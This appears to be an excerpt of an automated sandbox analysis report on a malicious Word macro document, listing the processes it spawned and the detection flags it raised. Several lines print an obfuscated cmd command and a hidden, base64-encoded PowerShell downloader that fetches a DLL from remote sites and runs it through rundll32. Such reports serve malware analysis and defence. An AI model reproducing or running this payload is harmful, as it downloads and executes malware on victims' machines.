                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsA
                      Source: unknownProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj',HGTGPppTjVNX
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unxqf\ouoi.jab',tPlaqqOeWpG
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unxqf\ouoi.jab',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iemuqepepuxnfb\fiqpbnltnychm.qgs',SlGUqAwWB
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iemuqepepuxnfb\fiqpbnltnychm.qgs',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzwbjgb\bmqjkk.hhh',AkVsWQgzjbvUf
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzwbjgb\bmqjkk.hhh',#1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj',HGTGPppTjVNX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unxqf\ouoi.jab',tPlaqqOeWpG
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unxqf\ouoi.jab',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iemuqepepuxnfb\fiqpbnltnychm.qgs',SlGUqAwWB
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iemuqepepuxnfb\fiqpbnltnychm.qgs',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzwbjgb\bmqjkk.hhh',AkVsWQgzjbvUf
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzwbjgb\bmqjkk.hhh',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2105632557.0000000002A50000.00000002.00000001.sdmp

                      Data Obfuscation:

                      barindex
                      Document contains an embedded VBA with many GOTO operations indicating source code obfuscationShow sources
                      Source: Arch_2021_717-1562532.docStream path 'Macros/VBA/Gusca95luq_' : High number of GOTO operations
                      Source: VBA code instrumentationOLE, VBA macro, High number of GOTO operations: Module Gusca95luq_
                      Obfuscated command line foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsA
                      Suspicious powershell command line foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUA